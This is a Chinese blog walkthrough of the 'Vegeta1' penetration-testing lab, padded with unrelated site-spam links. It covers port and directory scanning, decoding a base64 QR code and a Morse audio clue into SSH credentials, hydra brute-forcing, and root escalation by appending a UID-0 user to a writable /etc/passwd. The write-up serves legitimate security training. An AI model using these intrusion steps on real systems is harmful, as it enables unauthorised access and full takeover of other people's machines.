当前位置: 首页 > news >正文

打开免费百度啊东莞网络优化公司排名

打开免费百度啊,东莞网络优化公司排名,网站后台html编辑器,网络教育做的好的网站OSCP系列靶场-Esay-Vegeta1保姆级 目录 OSCP系列靶场-Esay-Vegeta1保姆级总结准备工作信息收集-端口扫描目标开放端口收集目标端口对应服务探测 信息收集-端口测试22-SSH端口的信息收集22-SSH端口版本信息与MSF利用22-SSH协议支持的登录方式22-SSH手动登录尝试(无)22-SSH弱口令…OSCP系列靶场-Esay-Vegeta1保姆级 目录 OSCP系列靶场-Esay-Vegeta1保姆级总结准备工作信息收集-端口扫描目标开放端口收集目标端口对应服务探测 信息收集-端口测试22-SSH端口的信息收集22-SSH端口版本信息与MSF利用22-SSH协议支持的登录方式22-SSH手动登录尝试(无)22-SSH弱口令爆破(待定) 80-HTTP端口的信息收集信息收集-HTML隐藏信息查看信息收集-目录扫描信息收集-目录扫描初步 信息收集-目录访问/robots.txt端点访问/find_me/端点访问/admin/端点其他端点 find_me.html加密信息破解 信息再收集新端点/bulma/ 漏洞利用-getwebshell已知密码-SSH用户爆破(失败)破译莫斯密码22-SSH账号密码登录 内网遨游-getshellFLAG1获取信息收集-内网基础信息收集检测Linux操作系统的发行版本检测Linux操作系统的内核版本检测当前用户的权限列举出所有的sudo文件su弱密码尝试(失败)列举出所有suid文件/etc/passwd权限收集/etc/shadow权限收集getcap标志进程收集列举定时任务查看历史信息确认/home目录下信息 权限提升可写etc/passwd提权 FLAG2获取 后记 总结 getwebshell : 目录扫描 → 发现音频 → 莫斯密码 → 解密得到账号密码 → ssh登录 提 权 思 路 : history发现线索 → /etc/passwd属主权限 → 写入root权限的账号密码 → 登录提权 准备工作 启动VPN 获取攻击机IP → 192.168.45.239 启动靶机 获取目标机器IP → 192.168.172.73 信息收集-端口扫描 目标开放端口收集 Nmap开放端口扫描2次(多次扫描减少误扫) sudo nmap --min-rate 10000 -p- 192.168.172.73PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 开放的端口-gt;22,80 目标端口对应服务探测 # tcp探测 sudo nmap -sT -sV -O -sC -p22,80 192.168.172.73PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian))信息收集-端口测试 22-SSH端口的信息收集 22-SSH端口版本信息与MSF利用 通过Nmap探测获得SSH的版本信息可以尝试利用 探测版本为OpenSSH 7.9p1 Debian 10deb10u2 (protocol 2.0) # 搜索对应脚本 msf6 gt; searchsploit openssh 7.922-SSH协议支持的登录方式 通过Nmap探测获得SSH的版本信息在获取到某个用户名之后尝试 sudo ssh rootspan classlabel label-primary192.168.172.73/span -v显示publickey、password就是支持密钥以及密码登录 22-SSH手动登录尝试(无) 因为支持密码登录尝试root账户的密码弱密码尝试 sudo ssh rootspan classlabel label-primary192.168.172.73/span -p 22 # 密码尝试 password gt; root弱密码尝试失败 22-SSH弱口令爆破(待定) 如果没思路的话准备ssh的root账户爆破 80-HTTP端口的信息收集 访问 http://192.168.172.73:80 不是CMS我们直接从HTML隐藏信息收集开始 信息收集-HTML隐藏信息查看 # 包括文章中是否写明一些敏感信息 curl http://192.168.172.73:80个人色彩浓厚可能用户与King Vegeta有关 信息收集-目录扫描 信息收集-目录扫描初步 # 用两个扫描器进行扫描更加的谨慎一些 dirsearch -u http://192.168.172.73:80 -x 302,403,404 dirb http://192.168.172.73:80因为扫出了目录深层次的扫描待选 信息收集-目录扫描(后缀) 信息收集-目录扫描(深度/大字典) 信息收集-目录扫描(深度/大字典后缀)信息收集-目录访问 /robots.txt端点访问 发现新的入口 /find_me ┌──(root㉿Kali)-[/home/bachang/Vegeta1] └─# curl http://192.168.172.73/robots.txt * /find_me/find_me/端点访问 发现是目录遍历 ┌──(root㉿Kali)-[/home/bachang/Vegeta1] └─# curl http://192.168.172.73/find_me/ ... h1Index of /find_me/h1 ...存在 find_me.html 访问 find_me.html发现提示Vegeta-1.0 尝试搜索msf没有任何收获 也对 Vegeta 是动漫角色猜测是否是其他提示 ┌──(root㉿Kali)-[/home/bachang/Vegeta1] └─# searchsploit Vegeta Exploits: No Results Shellcodes: No Results查看HTML发现隐藏内容是加密代码 curl http://192.168.172.73/find_me/find_me.html/admin/端点 在该端点下发现一个php文件 访问无任何内容 其他端点 其他端点内容是空 find_me.html加密信息破解 因为看到了两个等号猜测是bas64编码 echo aVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQU1nQUFBRElD.....GQUFBQUFFbEZUa1N1UW1DQw | base64 -d gt; main.txt访问之后发现还是看不懂在没有其他线索的情况下推测存在二次加密 看起来两串代码差不多尝试再次base64解密 这次解密之后发现开头是png内容看不懂说明是图片格式 转换成图片进行查看 mv main1.txt main.jpg打开发现是二维码 二维码本质上是url利用二维码转url的工具 百度上搜了一个 https://www.jzx.com/decode 得到了密码topshellv Password : topshellv信息再收集 尝试爆破获取的密码失败决定利用更大的字典进行目录扫描 gobuster dir -u http://192.168.172.73:80/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -e gt; go.txt爆破输出到go.txt发现一个新的端点 新端点/bulma/ 访问发现得到了一个.wav格式内容 通常是音频文件 下载下来 ┌──(root㉿Kali)-[/home/bachang/Vegeta1] └─# wget 192.168.172.73/bulma/hahahaha.wav --2023-07-31 13:45:21-- http://192.168.172.73/bulma/hahahaha.wav 正在连接 192.168.172.73:80... 已连接。 已发出 HTTP 请求正在等待回应... 200 OK 长度236124 (231K) [audio/x-wav] 正在保存至: “hahahaha.wav”浅浅的听了一下本来以为是英文听不懂结果就像暗号 对谍战片的摩斯密码 访问https://morsecode.world/international/decoder/audio-decoder-adaptive.html将音频上传 // 得到了信息 U S E R : T R U N K S P A S S W O R D : U S 3 R S I N D O L L A R S S Y M B O L )漏洞利用-getwebshell 已知密码-SSH用户爆破(失败) 推测获取的密码可以登录ssh尝试爆破 # -L 指定账号字典 -P指定密码字典 hydra -L /usr/share/wordlists/metasploit/unix_passwords.txt -p topshellv -t 6 -vV 192.168.172.73 ssh -s 22破译莫斯密码 22-SSH账号密码登录 将密码大致解密 U S E R : T R U N K S P A S S W O R D : U S 3 R S I N D O L L A R S S Y M B O L ) ------ user: trunkspassword:us3rsindollarssymbol ------猜测 user: trunks password:us3r sindollarssymbolsindollarssymbol百度半天说的是sin dollars symbol 先不管获取账号密码之后利用SSH进行登录发现错误 sudo ssh trunksspan classlabel label-primary192.168.172.73/span -p22 password gt; us3r尝试替换成新加坡币符号将s替换为$ sudo ssh trunksspan classlabel label-primary192.168.151.73/span -p22 password gt; u$3r成功登录 这里重启了一下靶场 ip变成了192.168.151.73 内网遨游-getshell FLAG1获取 trunksspan classlabel label-primaryVegeta/span:~$ find / -name local.txt 2gt;/dev/null /home/trunks/local.txt trunksspan classlabel label-primaryVegeta/span:~$ cat /home/trunks/local.txt 45274fd8969e954aa6a0416012e34589信息收集-内网基础信息收集 提权的本质在于枚举在获取shell之后我们要进行内网信息的收集都是为了提权做准备 检测Linux操作系统的发行版本 较老的Ubuntu以及Linux系统可以overlayfs提权 # 确定发行版本 trunksspan classlabel label-primaryVegeta/span:~$ lsb_release -a No LSB modules are available. Distributor ID: Debian Description: Debian GNU/Linux 10 (buster) Release: 10 Codename: buster发行版本为Debian不太能overlayfs提权 检测Linux操作系统的内核版本 较低的内核版本可以进行脏牛提权 trunksspan classlabel label-primaryVegeta/span:~$ uname -a Linux Vegeta 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2deb10u1 (2020-06-07) x86_64 GNU/Linux内核版本为4.19.0 检测当前用户的权限 trunksspan classlabel label-primaryVegeta/span:~$ id uid1000(trunks) gid1000(trunks) groups1000(trunks),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)列举出所有的sudo文件 查找具有sudo权限且不需要密码的可提权文件 如果发现sudo -l有东西的话 访问 https://gtfobins.github.io 寻找 # 利用sudo -l寻找 trunksspan classlabel label-primaryVegeta/span:~$ sudo -l -bash: sudo: command not found发现不存在sudo su弱密码尝试(失败) su password → root列举出所有suid文件 如果发现us有东西的话 访问 https://gtfobins.github.io 寻找 # -perm 文件权限 trunksspan classlabel label-primaryVegeta/span:~$ find / -perm -us -type f 2gt;/dev/null /usr/bin/su /usr/bin/gpasswd /usr/bin/umount /usr/bin/newgrp /usr/bin/chsh /usr/bin/passwd /usr/bin/chfn /usr/bin/mount /usr/bin/fusermount /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper/etc/passwd权限收集 如果/etc/passwd具有写入权限可以尝试覆盖密码提权 trunksspan classlabel label-primaryVegeta/span:~$ ls -al /etc/passwd -rw-r--r-- 1 trunks root 1486 Jun 28 2020 /etc/passwd/etc/shadow权限收集 如果/etc/shadow具有写入权限可以尝试覆盖密码提权如果/etc/shadow具有可读权限可以爆破密码 trunksspan classlabel label-primaryVegeta/span:~$ ls -al /etc/shadow -rw-r----- 1 root shadow 976 Aug 4 2020 /etc/shadowgetcap标志进程收集 高版本下suid列举不全查看getcap # 探查有CAP_SETUID标志的进程 trunksspan classlabel label-primaryVegeta/span:~$ /usr/sbin/getcap -r / 2gt;/dev/null /usr/bin/ping cap_net_rawep列举定时任务 查找所有的定时任务并且查看定时任务是否具有修改权限 # 寻找定时任务并修改进行提权 cat /etc/crontab查看历史信息 可能用户留下的历史信息具有有用的信息 trunksspan classlabel label-primaryVegeta/span:~$ history1 perl -le ‘print crypt(“Passwordspan classlabel label-primary973″,”addedsalt”)’#CTL{n}/span 2 perl -le print crypt(Passwordspan classlabel label-primary973/span,addedsalt)3 echo Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash gt;gt; /etc/passwd[/sh]4 echo Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash gt;gt; /etc/passwd5 ls6 su Tom7 ls -la8 cat .bash_history 9 sudo apt-get install vim10 apt-get install vim11 su root12 cat .bash_history 13 exit确认/home目录下信息 trunksspan classlabel label-primaryVegeta/span:~$ ls -al /home total 12 drwxr-xr-x 3 trunks trunks 4096 Aug 12 2020 trunks权限提升 可写etc/passwd提权 通过history的信息我们可以知道tom的密码应该是Passwordspan classlabel label-primary973被写入到了/etc/passwd中我们尝试切换用户 su Tom → Passwordspan classlabel label-primary973#CTL{n}su/span: user Tom does not exist提示说Tom用户不存在 # 发现确实没有Tom cat /etc/passwd | grep Tom那么根据提示我是否可以写入/etc/passwd echo Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash gt;gt; /etc/passwd提权成功 # 登录Tom账户 trunksspan classlabel label-primaryVegeta/span:~$ su Tom Password: rootspan classlabel label-primaryVegeta/span:/home/trunks# id uid0(root) gid0(root) groups0(root) rootspan classlabel label-primaryVegeta/span:/home/trunks# FLAG2获取 rootspan classlabel label-primaryVegeta/span:/home/trunks# cat /root/proof.txt 3295b595dffaab97e16918dfbf4d11de完结撒花~ 后记 这个没仔细看的内容回来思考一下 trunksspan classlabel label-primaryVegeta/span:~$ ls -al /etc/passwd -rw-r--r-- 1 trunks root 1486 Jun 28 2020 /etc/passwd显示了文件的权限为 -rw-r--r--所有者为 trunks所属组为 root 简称属于root组(属主) 之后看到这种情况要注意 学到了s与$之间的替换与莫斯密码的破译
http://www.zqtcl.cn/news/669466/

相关文章:

  • 深圳网站搜索优化工具义乌公司网站
  • 百度搜索网站带图片sem是什么品牌
  • 百度网盘app下载辽宁seo
  • 一般做网站用什么软件企业管理咨询服务机构
  • 达内培训网站开发金融公司网站 html
  • 珠海网站制作推荐微信营销和微博营销的区别
  • 电影网站如何做5网站建设公司
  • 河南网站优化公司哪家好南山网站设计线
  • 网站构建代码模板番禺网站建设
  • 拟一份饰品网站建设合同网站开发应注意哪些问题
  • 芜湖建站公司做网站的人多吗
  • 网站怎么加二级域名微信授权登录网站退出怎么做
  • 如何把旅行社网站做的好看网站创建方案怎么写
  • 织梦网站图标更换宠物网页设计图片
  • 如何查找网站竞争对手的宣传方式北京网站搭建公司电话
  • 北京正规制作网站公司wordpress 获取图片地址
  • 大学路网站建设推广图片素材
  • wordpress 创建网站搜索引擎优化代理
  • 设计网站用什么软件盈江城乡建设局网站
  • 网站建设模式有哪些内容seo品牌
  • 衡水做网站服务商济南如何挑选网站建设公司
  • 全屏的网站制作企业网站欢迎界面素材
  • 视频网站切片怎么做网站建设可自学吗
  • 本地推广平台网站seo优化如何做
  • 网站建设费算费用还是固定资产百度秒收录
  • 企业建站系统营销吧tt团队韩国企业网站设计
  • 上海嘉定网站建设公司有没有知道网址的
  • 电商网站的银行支付接入该怎么做杭州微信小程序外包
  • 余姚网站推广策划案门户网站做等保需要备案哪些
  • 网站关键字优化公司wordpress制作百度地图xml